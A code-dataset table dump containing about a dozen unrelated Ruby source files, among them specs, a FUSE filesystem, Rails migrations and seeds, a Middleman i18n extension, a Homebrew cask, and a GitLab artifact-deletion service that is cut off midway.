hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
bbb14cd25ba42039e50701b0fabfbd6929c8ff9b | 1,261 | # frozen_string_literal: true
require "regexer"
require "./spec/shared_examples/shared_examples_for_contains_test"
# Spec for Regexer::Pattern#starts_with; reuses the shared examples for
# #contains since starts_with delegates to it (see NOTE below).
RSpec.describe "Regexer::Pattern #starts_with" do
  # Value handed to starts_with; overridden per shared example.
  let(:val) { nil }

  # Builds the DSL block given to PatternBuilder. The outer lambda is called
  # immediately with +val+ so the returned -> closes over the evaluated
  # value rather than re-reading the let helper inside the builder.
  let(:pattern_block) do
    lambda do |value|
      -> { starts_with value }
    end.call(val)
  end

  # The compiled Regexp produced by the builder.
  subject(:pattern) do
    Regexer::PatternBuilder.new(&pattern_block).result.regex
  end

  # NOTE: Under the hood, starts_with method actually uses the contains method
  include_examples "contains method test examples", [
    {
      case: "when value is an exact integer: 26543",
      test_value: 26_543,
      expected_value: /^(26543)/
    },
    {
      case: "when value is an exact float: 3.56",
      test_value: 3.56,
      expected_value: /^(3\.56)/
    },
    {
      case: "when value is an exact set of characters: 'testing'",
      test_value: "testing",
      expected_value: /^(testing)/
    },
    {
      case: "when value contains regex special characters",
      test_value: ".+*?^$()[]{}|\\",
      custom_assertion_message: "escapes those special characters in the final generated pattern",
      expected_value: /^(\.\+\*\?\^\$\(\)\[\]\{\}\|\\)/
    }
  ]

  include_examples "contains method invalid value error test example", value: /test/
end
| 28.022222 | 98 | 0.638382 |
f7046ba085c78420881a0f530e9c92fd4210bde5 | 149 | class Image < ActiveRecord::Base
# Backing table is namespaced (Sir Trevor editor images).
self.table_name = 'sir_trevor_images'
# CarrierWave uploader that handles the attached file.
mount_uploader :file, ImageUploader
validates :file, :presence => true
end | 29.8 | 39 | 0.778523 |
117a3774110bf98fd8dc7176fe6057ec18d29c57 | 9,175 | #encoding:utf-8
testfs_dir = File.expand_path(File.dirname(__FILE__))
require File.expand_path(File.join(testfs_dir, '/data_structure/inode.rb'))
require File.expand_path(File.join(testfs_dir, '/data_structure/dir_entry.rb'))
require File.expand_path(File.join(testfs_dir, '/data_structure/file_data.rb'))
require File.expand_path(File.join(testfs_dir, '/cache/inode_cache_manager.rb'))
require File.expand_path(File.join(testfs_dir, '/cache/dir_cache_manager.rb'))
require 'rbfuse'
module TestFS
class FSCore < RbFuse::FuseDir
# Sets up the backing hash table, caches and open-handle registry.
# +config+ is currently unused. When option[:p2p] is given, a DHT-backed
# table is used instead of the in-process one.
def initialize(config, option)
  if option[:p2p].nil?
    require File.expand_path(File.join(File.expand_path(File.dirname(__FILE__)), '/hash_table/local_hash.rb'))
    @table = HashTable.new(LocalHashTable.new)
  else
    require File.expand_path(File.join(File.expand_path(File.dirname(__FILE__)), '/hash_table/distributed_hash.rb'))
    @table = HashTable.new(DistributedHashTable.new(option[:p2p]))
  end
  # Caches (capacity 100) in front of the hash table.
  @inode_cache = InodeCacheManager.new(100)
  @dir_cache = DirCacheManager.new(100)
  # Open file handles: handle => [mode, buffer].
  @open_entries = {}
  create_root_dir
end
# Opens +path+ and stages its contents in an in-memory buffer keyed by
# +handle+. For readable modes the current contents are loaded; otherwise
# (or when the file does not exist yet) an empty buffer is used.
# Returns true so FUSE treats the open as successful.
def open(path, mode, handle)
  buf = nil
  if mode =~ /r/
    file = get_file(path)
    # Guard: get_file returns nil for a missing file; the original crashed
    # on nil.value here.
    buf = file.value if file
  end
  buf ||= ""
  # The original called buf.encode("ASCII-8bit") and discarded the result
  # (a no-op). Re-tag a private copy as binary instead, so the byte-wise
  # offsets used by read/write are safe and cached strings are not mutated.
  buf = buf.dup.force_encoding(Encoding::ASCII_8BIT)
  @open_entries[handle] = [mode, buf]
  true
end
# Returns +size+ bytes of the open buffer for +handle+ starting at +off+.
def read(path, off, size, handle)
  @open_entries[handle][1][off, size]
end

# Splices +buf+ into the open buffer for +handle+ at byte offset +off+.
def write(path, off, buf, handle)
  @open_entries[handle][1][off, buf.bytesize] = buf
end

# Flushes the buffered contents back to storage and releases the handle.
# Returns nil when the handle is unknown.
def close(path, handle)
  return nil unless @open_entries[handle]
  set_file(path, @open_entries[handle][1])
  @open_entries.delete(handle)
end

# FUSE stat callback; delegates to getattr.
def stat(path)
  getattr(path)
end

# Deletes the file at +path+.
def delete(path)
  delete_file(path)
end

# Lists entry names in the directory at +path+ ([] when unknown).
def readdir(path)
  entry = dir_entries(path)
  return entry.nil? ? [] : entry
end
# Builds a stat structure for +path+: a file stat carrying the size for
# regular files, a directory stat for directories. Returns nil (implicitly)
# when the entry does not exist or its inode type is unknown.
# NOTE(review): get_dir_entry can return nil for an invalid parent path, in
# which case has_key? below would raise — confirm FUSE never passes such paths.
def getattr(path)
  filename = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(filename)
    uuid = current_dir[filename]
    inode = get_inode(uuid)
    if inode.type == :file
      stat = RbFuse::Stat.file
      stat.size = inode.size
      return stat
    elsif inode.type == :dir
      return RbFuse::Stat.dir
    else
      return nil
    end
  end
end
# FUSE unlink callback; removes the file and reports success.
def unlink(path)
  delete_file(path)
  true
end

# Creates a directory at +path+ (+mode+ is ignored).
def mkdir(path, mode)
  set_dir(path, DirEntry.new)
  return true
end

# Recursively removes the directory at +path+, its hash-table records and
# any cached copies, then unhooks it from its parent entry.
def rmdir(path)
  basename = File.basename(path)
  current_dir = get_dir_entry(path) # parent directory entry
  deldir_inode = get_inode(current_dir[basename])
  remove_lower_dir(deldir_inode)
  current_dir.delete(basename)
  store_hash_table(current_dir.uuid, current_dir)
  @dir_cache.delete(deldir_inode.pointer)
  @inode_cache.delete(deldir_inode.ino)
  return true
end

# Moves the entry at +path+ to +destpath+ by re-pointing its uuid from the
# old parent's entry table into the new parent's.
def rename(path, destpath)
  parent_entry = get_dir_entry(path)
  target_uuid = parent_entry[File.basename(path)]
  parent_entry.delete(File.basename(path))
  store_hash_table(parent_entry.uuid, parent_entry)
  @dir_cache.store(parent_entry)
  newparent_entry = get_dir_entry(destpath)
  newparent_entry.store(File.basename(destpath), target_uuid)
  store_hash_table(newparent_entry.uuid, newparent_entry)
  @dir_cache.store(newparent_entry)
  return true
end

# True when +path+ names an existing directory.
def directory?(path)
  dirname = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(dirname)
    uuid = current_dir[dirname]
    inode = get_inode(uuid)
    return true if inode.type == :dir
  end
  return false
end
private
# Stores a key/value pair in the hash table.
# @param [String] key key to associate the value with
# @param [Object] value object associated with the key
def store_hash_table(key, value)
  @table.store(key, value)
end

# Fetches an object from the hash table.
# @param [String] key key the value was stored under
# @return [Object] the object associated with the key
def get_hash_table(key)
  return @table.get(key)
end

# Removes an object from the hash table.
# @param [String] key key the value was stored under
def delete_hash_table(key)
  @table.delete(key)
end
# Returns the list of entry names inside the directory at +path+.
# @param [String] path path of the target directory (resolved as-is,
#   without splitting off a basename)
# @return [Array, nil] file names in the directory, or nil when the path
#   does not resolve to a directory
def dir_entries(path)
  current_dir = get_dir_entry(path, false)
  # get_dir_entry returns nil for unknown paths; the original then raised
  # NoMethodError on nil.keys even though readdir explicitly handles nil.
  return nil if current_dir.nil?
  current_dir.keys
end
# Resolves a directory entry by walking the path from the root.
# @param [String] path path pointing at the target directory
# @param [boolean] split_path when true, only the dirname of +path+ is
#   resolved (i.e. the parent of the named entry)
# @return [DirEntry, nil] the directory entry, or nil when a path
#   component does not exist
def get_dir_entry(path, split_path = true)
  path = File.dirname(path) if split_path == true
  # Inode "2" is the fixed root inode (see create_root_dir).
  root_inode = get_inode("2")
  current_dir = get_dir(root_inode.pointer)
  if path != '/'
    splited_path = path.split("/").reject{|x| x == "" }
    splited_path.each do |dir|
      return nil unless current_dir.has_key?(dir)
      current_inode = get_inode(current_dir[dir])
      current_dir = get_dir(current_inode.pointer)
    end
  end
  return current_dir
end

# Recursively deletes the contents of the given directory's subtree,
# including hash-table records and cached copies.
# @param [Inode] deldir_inode inode of the directory to delete
def remove_lower_dir(deldir_inode)
  dir_entry = get_hash_table(deldir_inode.pointer)
  dir_entry.each do |entry, uuid|
    inode = get_inode(uuid)
    remove_lower_dir(inode) if inode.type == :dir
    delete_hash_table(uuid)
    delete_hash_table(inode.pointer)
    @inode_cache.delete(uuid)
    @dir_cache.delete(inode.pointer)
  end
  delete_hash_table(deldir_inode.ino)
  delete_hash_table(dir_entry.uuid)
  @inode_cache.delete(deldir_inode.ino)
  @dir_cache.delete(dir_entry.uuid)
end

# Creates the root directory's inode (fixed ino "2") and entry table.
def create_root_dir
  inode = Inode.new(:dir, "2")
  dir_entry = DirEntry.new
  inode.pointer = dir_entry.uuid
  store_hash_table(inode.ino, inode)
  store_hash_table(dir_entry.uuid, dir_entry)
  @inode_cache.store(inode)
  @dir_cache.store(dir_entry)
end
# Creates a directory's inode and entry table and links it under its parent.
# @param [String] path path of the directory to create
# @param [DirEntry] dest_dir the new (empty) directory entry
# @return [boolean] false when a directory with the same name already exists
def set_dir(path, dest_dir)
  dest_dir_name = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(dest_dir_name)
    samename_uuid = current_dir[dest_dir_name]
    samename_inode = get_inode(samename_uuid)
    return false if samename_inode.type == :dir
  end
  dest_inode = Inode.new(:dir)
  dest_inode.pointer = dest_dir.uuid
  store_hash_table(dest_inode.ino, dest_inode)
  store_hash_table(dest_dir.uuid, dest_dir)
  current_dir.store(dest_dir_name, dest_inode.ino)
  store_hash_table(current_dir.uuid, current_dir)
  @inode_cache.store(dest_inode)
  @dir_cache.store(dest_dir)
  @dir_cache.store(current_dir)
  return true
end

# Fetches a file's data record.
# @param [String] path path of the target file
# @return [FileData, nil] nil when the file does not exist
def get_file(path)
  filename = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(filename)
    uuid = current_dir[filename]
    inode = get_inode(uuid)
    filedata = get_hash_table(inode.pointer)
    return filedata
  end
  return nil
end

# Creates or updates a file's inode and data record.
# @param [String] path path of the target file
# @param [String] str byte string to store as the file contents
def set_file(path, str)
  filename = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(filename)
    # Existing file: reuse its inode and data record.
    inode = get_inode(current_dir[filename])
    file_data = get_hash_table(inode.pointer)
  else
    file_data = FileData.new
    inode = Inode.new(:file)
    inode.pointer = file_data.uuid
  end
  file_data.value = str
  inode.size = str.bytesize
  store_hash_table(inode.ino, inode)
  store_hash_table(file_data.uuid, file_data)
  current_dir.store(filename, inode.ino)
  store_hash_table(current_dir.uuid, current_dir)
  @inode_cache.store(inode)
  @dir_cache.store(current_dir)
  return true
end

# Deletes a file along with its hash-table records and cached copies.
# @param [String] path path of the target file
# @return [boolean] false when the file does not exist
def delete_file(path)
  filename = File.basename(path)
  current_dir = get_dir_entry(path)
  if current_dir.has_key?(filename)
    uuid = current_dir[filename]
    inode = get_inode(uuid)
    current_dir.delete(filename)
    store_hash_table(current_dir.uuid, current_dir)
    delete_hash_table(uuid)
    delete_hash_table(inode.pointer)
    @inode_cache.delete(uuid)
    @dir_cache.delete(inode.pointer)
    return true
  end
  return false
end
# Looks up an inode, preferring the in-memory cache over the hash table.
def get_inode(uuid)
  return @inode_cache.get(uuid) if @inode_cache.has_cache?(uuid)

  get_hash_table(uuid)
end
# Looks up a directory entry, preferring the cache over the hash table.
def get_dir(uuid)
  @dir_cache.has_cache?(uuid) ? @dir_cache.get(uuid) : get_hash_table(uuid)
end
end
end
| 27.552553 | 120 | 0.658093 |
1da439046ea6e288520587c613d8148fb92e3e71 | 43 | '1234'.succ #=> '1235'
'99'.succ #=> '100'
| 14.333333 | 22 | 0.488372 |
ffa0e81095d8f6f5d3600c9fe7430c748f689e93 | 470 | cask 'pgweb' do
version '0.9.8'
sha256 '07b1240f07fd826fb4987b4cc1859d5baf007b80f63602c58101f0437001d9f8'
url "https://github.com/sosedoff/pgweb/releases/download/v#{version}/pgweb_darwin_amd64.zip"
# NOTE(review): `appcast ... checkpoint:` is the legacy Homebrew-Cask form;
# current brew dropped checkpoints — confirm the targeted brew version.
appcast 'https://github.com/sosedoff/pgweb/releases.atom',
        checkpoint: 'd86058f025c53c9def9b11b905cc9ce05f73c16055614c717c536363c612298b'
name 'pgweb'
homepage 'https://github.com/sosedoff/pgweb'
# Plain binary (no .app bundle); symlinked into PATH as `pgweb`.
binary 'pgweb_darwin_amd64', target: 'pgweb'
end
| 36.153846 | 94 | 0.782979 |
d5dec8e20a606a540d8d08bba599795384f9ed7d | 6,133 | class Middleman::CoreExtensions::Internationalization < ::Middleman::Extension
option :no_fallbacks, false, 'Disable I18n fallbacks'
option :langs, nil, 'List of langs, will autodiscover by default'
option :lang_map, {}, 'Language shortname map'
option :path, '/:locale/', 'URL prefix path'
option :templates_dir, 'localizable', 'Location of templates to be localized'
option :mount_at_root, nil, 'Mount a specific language at the root of the site'
option :data, 'locales', 'The directory holding your locale configurations'
# Middleman hook: wires up I18n once the app configuration is known —
# fallbacks, locale file watching, default (root-mounted) language, and
# ignoring of the raw localizable templates.
def after_configuration
  # See https://github.com/svenfuchs/i18n/wiki/Fallbacks
  unless options[:no_fallbacks]
    require 'i18n/backend/fallbacks'
    ::I18n::Backend::Simple.send(:include, ::I18n::Backend::Fallbacks)
  end

  locales_file_path = options[:data]

  # Tell the file watcher to observe the :data_dir
  app.files.watch :locales,
                  path: File.join(app.root, locales_file_path),
                  ignore: proc { |f| !(/.*(rb|yml|yaml)$/.match(f[:relative_path])) }

  # Setup data files before anything else so they are available when
  # parsing config.rb
  app.files.on_change(:locales, &method(:on_file_changed))

  @maps = {}
  # Default root-mounted language falls back to the first known locale.
  @mount_at_root = options[:mount_at_root].nil? ? langs.first : options[:mount_at_root]

  # Don't output localizable files
  app.ignore File.join(options[:templates_dir], '**')

  configure_i18n

  logger.info "== Locales: #{langs.join(', ')} (Default #{@mount_at_root})"
end
helpers do
  # Translation helper; thin wrapper around I18n.t.
  def t(*args)
    ::I18n.t(*args)
  end

  # Resolves partials, preferring a language-suffixed variant
  # (e.g. partial.en.erb) and the localizable templates directory.
  def locate_partial(partial_name)
    locals_dir = extensions[:i18n].options[:templates_dir]

    # Try /localizable
    partials_path = File.join(locals_dir, partial_name)

    lang_suffix = current_resource.metadata[:locals] && current_resource.metadata[:locals][:lang]

    extname = File.extname(partial_name)
    maybe_static = extname.length > 0
    suffixed_partial_name = if maybe_static
                              partial_name.sub(extname, ".#{lang_suffix}#{extname}")
                            else
                              "#{partial_name}.#{lang_suffix}"
                            end

    if lang_suffix
      super(suffixed_partial_name) ||
        super(File.join(locals_dir, suffixed_partial_name)) ||
        super(partials_path) ||
        super
    else
      super(partials_path) ||
        super
    end
  end
end

Contract None => ArrayOf[Symbol]
# Memoized list of known locales (see known_languages).
def langs
  @langs ||= known_languages
end

# Update the main sitemap resource list
# @return Array<Middleman::Sitemap::Resource>
Contract ResourceList => ResourceList
def manipulate_resource_list(resources)
  new_resources = []

  resources.each do |resource|
    # If it uses file extension localization
    if result = parse_locale_extension(resource.path)
      ext_lang, path, page_id = result
      new_resources << build_resource(path, resource.path, page_id, ext_lang)
    # If it's a "localizable template"
    elsif File.fnmatch?(File.join(options[:templates_dir], '**'), resource.path)
      page_id = File.basename(resource.path, File.extname(resource.path))
      langs.each do |lang|
        # Remove folder name
        path = resource.path.sub(options[:templates_dir], '')
        new_resources << build_resource(path, resource.path, page_id, lang)
      end
    end

    # This is for backwards compatibility with the old provides_metadata-based code
    # that used to be in this extension, but I don't know how much sense it makes.
    next if resource.options[:lang]

    resource.add_metadata options: { lang: @mount_at_root }, locals: { lang: @mount_at_root }
  end

  resources + new_resources
end
private
Contract Any, Any => Any
# Locale-file change handler: drops the memoized language list and reloads
# I18n translations.
def on_file_changed(_updated_files, _removed_files)
  # Clear langs cache. The original cleared @_langs, but langs memoizes
  # into @langs, so the cache was never actually invalidated.
  @langs = nil

  # TODO, add new file to ::I18n.load_path
  ::I18n.reload!
end
# Points I18n at the watched locale files and resets default locale
# and fallbacks to the root-mounted language.
def configure_i18n
  ::I18n.load_path += app.files.by_type(:locales).files.map { |p| p[:full_path].to_s }
  ::I18n.reload!

  ::I18n.default_locale = @mount_at_root

  # Reset fallbacks to fall back to our new default
  ::I18n.fallbacks = ::I18n::Locale::Fallbacks.new if ::I18n.respond_to?(:fallbacks)
end

Contract None => ArrayOf[Symbol]
# Locales from options[:langs] when given, otherwise discovered from the
# top-level locale data files (foo.yml / foo.rb => :foo).
def known_languages
  if options[:langs]
    Array(options[:langs]).map(&:to_sym)
  else
    known_langs = app.files.by_type(:locales).files.select do |p|
      p[:relative_path].to_s.split(File::SEPARATOR).length == 1
    end

    known_langs.map { |p|
      File.basename(p[:relative_path].to_s).sub(/\.ya?ml$/, '').sub(/\.rb$/, '')
    }.sort.map(&:to_sym)
  end
end

# Parse locale extension filename
# @return [lang, path, basename]
# will return +nil+ if no locale extension
Contract String => Maybe[[Symbol, String, String]]
def parse_locale_extension(path)
  path_bits = path.split('.')
  # Need at least name.locale.ext for a locale extension to be present.
  return nil if path_bits.size < 3

  lang = path_bits.delete_at(-2).to_sym
  return nil unless langs.include?(lang)

  path = path_bits.join('.')
  basename = File.basename(path_bits[0..-2].join('.'))
  [lang, path, basename]
end
Contract String, String, String, Symbol => IsA['Middleman::Sitemap::Resource']
# Builds a localized proxy resource for +path+ in +lang+. The I18n locale
# is switched while translating the page id and is restored in an ensure
# block, so an exception during translation cannot leak the locale.
def build_resource(path, source_path, page_id, lang)
  old_locale = ::I18n.locale
  ::I18n.locale = lang

  # Translate the page id (paths.<page_id>), falling back to the raw id.
  localized_page_id = ::I18n.t("paths.#{page_id}", default: page_id, fallback: [])

  prefix = if (options[:mount_at_root] == lang) || (options[:mount_at_root].nil? && langs[0] == lang)
             '/'
           else
             replacement = options[:lang_map].fetch(lang, lang)
             options[:path].sub(':locale', replacement.to_s)
           end

  # path needs to be changed if file has a localizable extension. (options[mount_at_root] == lang)
  path = ::Middleman::Util.normalize_path(
    File.join(prefix, path.sub(page_id, localized_page_id))
  )

  path = path.sub(options[:templates_dir] + '/', '')

  p = ::Middleman::Sitemap::ProxyResource.new(app.sitemap, path, source_path)
  p.add_metadata locals: { lang: lang, page_id: path }, options: { lang: lang }
  p
ensure
  # Previously restored inline before the return, which skipped restoration
  # whenever an exception was raised above.
  ::I18n.locale = old_locale
end
end
| 32.973118 | 103 | 0.662971 |
5dbd1990896d3d6fa7267c721fc62d32ff0b59ae | 800 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
# Seed ten users with random Faker data and a shared dev-only password.
# (Unused block parameter |i| removed.)
10.times do
  User.create!(
    first_name: Faker::Name.first_name,
    last_name: Faker::Name.last_name,
    email: Faker::Internet.email,
    avatar: Faker::Avatar.image,
    password: '123123'
  )
end
20.times do |i|
Message.create(
title: Faker::Job.title,
body: Faker::ChuckNorris.fact,
sender_id: Faker::Number.between(1, 10),
recipient_id: Faker::Number.between(1, 10),
)
end | 26.666667 | 111 | 0.6675 |
08a3adce8ccb9e1b691b50f8a4408df7b296dda9 | 86 | require 'angular/ngt/version'
require 'angular/ngt/engine'
require 'angular/ngt/haml'
| 21.5 | 29 | 0.790698 |
6aa94f7b20b1b35500ee84842becef0510bc846a | 396 | # frozen_string_literal: true
# Adds a composite index on project_mirror_data used to count pending
# mirror updates efficiently.
class AddIndexToCountPendingMirrorUpdates < ActiveRecord::Migration[5.1]
  include Gitlab::Database::MigrationHelpers

  # No downtime: the index is created/removed concurrently.
  DOWNTIME = false

  # Concurrent index operations cannot run inside a transaction.
  disable_ddl_transaction!

  def up
    add_concurrent_index :project_mirror_data, [:last_update_at, :retry_count]
  end

  def down
    remove_concurrent_index :project_mirror_data, [:last_update_at, :retry_count]
  end
end
| 22 | 81 | 0.790404 |
e925b4df8ed1d8c754a17f6d582c2b6ac0f420c8 | 5,259 | require 'test_helper'
class Kaui::BundlesControllerTest < Kaui::FunctionalTestHelper
test 'should be redirected if an invalid account id was specified in index screen' do
account_id = SecureRandom.uuid.to_s
get :index, :account_id => account_id
assert_redirected_to account_path(account_id)
assert_equal "Error while communicating with the Kill Bill server: Object id=#{account_id} type=ACCOUNT doesn't exist!", flash[:error]
end
test 'should get index with existing tags' do
tag_definition_ids = []
def1 = create_tag_definition(SecureRandom.uuid.to_s[0..19], @tenant);
tag_definition_ids << def1
tag_definition_ids << def1
def2 = create_tag_definition(SecureRandom.uuid.to_s[0..19], @tenant);
tag_definition_ids << def2
add_tags(@bundle, tag_definition_ids, @tenant);
get :index, :account_id => @bundle.account_id
assert_response 200
assert_not_nil assigns(:account)
assert_not_nil assigns(:bundles)
assert_not_nil assigns(:tags_per_bundle)
assert_equal 2, assigns(:tags_per_bundle)[@bundle.bundle_id].size
end
test 'should handle Kill Bill errors during transfer' do
post :do_transfer, :id => @bundle.bundle_id
assert_redirected_to home_path
assert_equal 'Required parameter missing: new_account_key', flash[:error]
new_account_key = SecureRandom.uuid.to_s
post :do_transfer, :id => @bundle.bundle_id, :new_account_key => new_account_key
assert_redirected_to home_path
assert_equal "Error while communicating with the Kill Bill server: Object id=#{new_account_key} type=ACCOUNT doesn't exist!", flash[:error]
bundle_id = SecureRandom.uuid.to_s
post :do_transfer, :id => bundle_id, :new_account_key => @account2.external_key
assert_redirected_to home_path
assert_equal "Error while communicating with the Kill Bill server: Object id=#{bundle_id} type=BUNDLE doesn't exist!", flash[:error]
end
test 'should get transfer' do
get :transfer, :id => @bundle.bundle_id
assert_response 200
assert_not_nil assigns(:bundle_id)
end
test 'should transfer bundle default policy' do
check_bundle_owner(@account.account_id)
post :do_transfer,
:id => @bundle.bundle_id,
:new_account_key => @account2.external_key
assert_redirected_to account_bundles_path(@account2.account_id)
assert_equal 'Bundle was successfully transferred', flash[:notice]
check_bundle_owner(@account2.account_id)
end
test 'should transfer bundle immediately' do
check_bundle_owner(@account.account_id)
post :do_transfer,
:id => @bundle.bundle_id,
:new_account_key => @account2.external_key,
:billing_policy => 'IMMEDIATE'
assert_redirected_to account_bundles_path(@account2.account_id)
assert_equal 'Bundle was successfully transferred', flash[:notice]
check_bundle_owner(@account2.account_id)
end
test 'should expose restful endpoint' do
get :restful_show, :id => @bundle.bundle_id
assert_redirected_to account_bundles_path(@bundle.account_id)
get :restful_show, :id => @bundle.external_key
assert_redirected_to account_bundles_path(@bundle.account_id)
end
test 'should get pause_resume ' do
get :pause_resume, :id => @bundle.bundle_id
assert_response :success
assert has_input_field('pause_requested_date')
assert has_input_field('resume_requested_date')
end
test 'should put bundle on pause and resume' do
expected_response_path = "/accounts/#{@account.account_id}/bundles"
bundle = create_bundle(@account, @tenant)
# put bundle on pause
put :do_pause_resume, :id => bundle.bundle_id,:account_id => @account.account_id, :pause_requested_date => DateTime.now.strftime('%F')
assert_response :redirect
assert_equal 'Bundle was successfully paused', flash[:notice]
# validate redirect path
assert response_path.include?(expected_response_path), "#{response_path} is expected to contain #{expected_response_path}"
# resume bundle on pause
put :do_pause_resume, :id => bundle.bundle_id,:account_id => @account.account_id, :resume_requested_date => DateTime.now.strftime('%F')
assert_response :redirect
assert_equal 'Bundle was successfully resumed', flash[:notice]
# validate redirect path
assert response_path.include?(expected_response_path), "#{response_path} is expected to contain #{expected_response_path}"
end
private
def create_tag_definition(tag_definition_name, tenant, username = USERNAME, password = PASSWORD, reason = nil, comment = nil)
input = Kaui::TagDefinition.new(tag_definition_name)
input.name = tag_definition_name
input.description = 'something'
input.applicable_object_types = ['BUNDLE']
tag_def = input.create(username, reason, comment, build_options(tenant, username, password))
tag_def.id
end
def add_tags(bundle, tag_definition_ids, tenant, username = USERNAME, password = PASSWORD, reason = nil, comment = nil)
bundle.set_tags(tag_definition_ids, username, reason, comment, build_options(tenant, username, password))
end
def check_bundle_owner(new_owner)
assert_equal new_owner, Kaui::Bundle.find_by_external_key(@bundle.external_key, false, options).account_id
end
end
| 40.145038 | 143 | 0.74729 |
38359470e3e7a9e75ea8eae63dc2381d025a6c99 | 1,055 | module TD::Types
# Describes a poll.
#
# @attr id [Integer] Unique poll identifier.
# @attr question [String] Poll question, 1-255 characters.
# @attr options [Array<TD::Types::PollOption>] List of poll answer options.
# @attr total_voter_count [Integer] Total number of voters, participating in the poll.
# @attr recent_voter_user_ids [Array<Integer>] User identifiers of recent voters, if the poll is non-anonymous.
# @attr is_anonymous [Bool] True, if the poll is anonymous.
# @attr type [TD::Types::PollType] Type of the poll.
# @attr is_closed [Bool] True, if the poll is closed.
class Poll < Base
  # NOTE(review): the attributes below are documented above but commented
  # out, so instances will not expose id/question/options/total_voter_count/
  # is_closed. Confirm whether this is intentional or an unfinished edit.
  # attribute :id, TD::Types::Integer
  # attribute :question, TD::Types::String
  # attribute :options, TD::Types::Array.of(TD::Types::PollOption)
  # attribute :total_voter_count, TD::Types::Integer
  attribute :recent_voter_user_ids, TD::Types::Array.of(TD::Types::Integer)
  attribute :is_anonymous, TD::Types::Bool
  attribute :type, TD::Types::PollType
  # attribute :is_closed, TD::Types::Bool
end
end
| 45.869565 | 113 | 0.708057 |
d5a0a2dd88564e614d48e4bcdac9100e40096d0b | 5,857 | # frozen_string_literal: true
module Ci
module JobArtifacts
class DestroyBatchService
include BaseServiceUtility
include ::Gitlab::Utils::StrongMemoize
# Danger: Private - Should only be called in Ci Services that pass a batch of job artifacts
# Not for use outside of the Ci:: namespace
# Adds the passed batch of job artifacts to the `ci_deleted_objects` table
# for asynchronous destruction of the objects in Object Storage via the `Ci::DeleteObjectsService`
# and then deletes the batch of related `ci_job_artifacts` records.
# Params:
# +job_artifacts+:: A relation of job artifacts to destroy (fewer than MAX_JOB_ARTIFACT_BATCH_SIZE)
# +pick_up_at+:: When to pick up for deletion of files
# +fix_expire_at+:: Whether to detect artifacts with wrongly backfilled expire_at
#                   (see detect_and_fix_wrongly_expired_artifacts)
# Returns:
# +Hash+:: A hash with status and destroyed_artifacts_count keys
def initialize(job_artifacts, pick_up_at: nil, fix_expire_at: fix_expire_at?)
  # Materialize the relation once, with destroy-related associations preloaded.
  @job_artifacts = job_artifacts.with_destroy_preloads.to_a
  @pick_up_at = pick_up_at
  @fix_expire_at = fix_expire_at
end
# rubocop: disable CodeReuse/ActiveRecord
# Destroys the batch: moves files into ci_deleted_objects and deletes the
# ci_job_artifacts rows in one transaction, then updates statistics.
# @param update_stats [Boolean] skip the statistics update when false
# @return [Hash] status payload with :destroyed_artifacts_count and :statistics_updates
def execute(update_stats: true)
  # Detect and fix artifacts that had `expire_at` wrongly backfilled by migration
  # https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47723
  detect_and_fix_wrongly_expired_artifacts

  return success(destroyed_artifacts_count: 0, statistics_updates: {}) if @job_artifacts.empty?

  destroy_related_records(@job_artifacts)

  Ci::DeletedObject.transaction do
    Ci::DeletedObject.bulk_import(@job_artifacts, @pick_up_at)
    Ci::JobArtifact.id_in(@job_artifacts.map(&:id)).delete_all
  end

  after_batch_destroy_hook(@job_artifacts)

  # This is executed outside of the transaction because it depends on Redis
  update_project_statistics! if update_stats
  increment_monitoring_statistics(artifacts_count, artifacts_bytes)

  success(destroyed_artifacts_count: artifacts_count,
          statistics_updates: affected_project_statistics)
end
# rubocop: enable CodeReuse/ActiveRecord
private
# Overridden in EE
def destroy_related_records(artifacts); end

# Overridden in EE
def after_batch_destroy_hook(artifacts); end

# using ! here since this can't be called inside a transaction
def update_project_statistics!
  affected_project_statistics.each do |project, delta|
    project.increment_statistic_value(Ci::JobArtifact.project_statistics_name, delta)
  end
end

# Memoized map of project => (negative) byte delta for the destroyed artifacts.
def affected_project_statistics
  strong_memoize(:affected_project_statistics) do
    artifacts_by_project = @job_artifacts.group_by(&:project)
    artifacts_by_project.each.with_object({}) do |(project, artifacts), accumulator|
      delta = -artifacts.sum { |artifact| artifact.size.to_i }
      accumulator[project] = delta
    end
  end
end

def increment_monitoring_statistics(size, bytes)
  metrics.increment_destroyed_artifacts_count(size)
  metrics.increment_destroyed_artifacts_bytes(bytes)
end

def metrics
  @metrics ||= ::Gitlab::Ci::Artifacts::Metrics.new
end

# Number of artifacts in the batch (memoized).
def artifacts_count
  strong_memoize(:artifacts_count) do
    @job_artifacts.count
  end
end

# Total byte size of the batch (memoized); artifacts without a size count as 0.
def artifacts_bytes
  strong_memoize(:artifacts_bytes) do
    @job_artifacts.sum { |artifact| artifact.try(:size) || 0 }
  end
end
# This detects and fixes job artifacts that have `expire_at` wrongly backfilled by the migration
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47723.
# These job artifacts will not be deleted and will have their `expire_at` removed.
#
# The migration would have backfilled `expire_at`
# to midnight on the 22nd of the month of the local timezone,
# storing it as UTC time in the database.
#
# If the timezone setting has changed since the migration,
# the `expire_at` stored in the database could have changed to a different local time other than midnight.
# For example:
# - changing timezone from UTC+02:00 to UTC+02:30 would change the `expire_at` in local time 00:00:00 to 00:30:00.
# - changing timezone from UTC+00:00 to UTC-01:00 would change the `expire_at` in local time 00:00:00 to 23:00:00 on the previous day (21st).
#
# Therefore job artifacts that have `expire_at` exactly on the 00, 30 or 45 minute mark
# on the dates 21, 22, 23 of the month will not be deleted.
# https://en.wikipedia.org/wiki/List_of_UTC_time_offsets
def detect_and_fix_wrongly_expired_artifacts
  return unless @fix_expire_at

  # Keep only the legitimately expired artifacts in @job_artifacts.
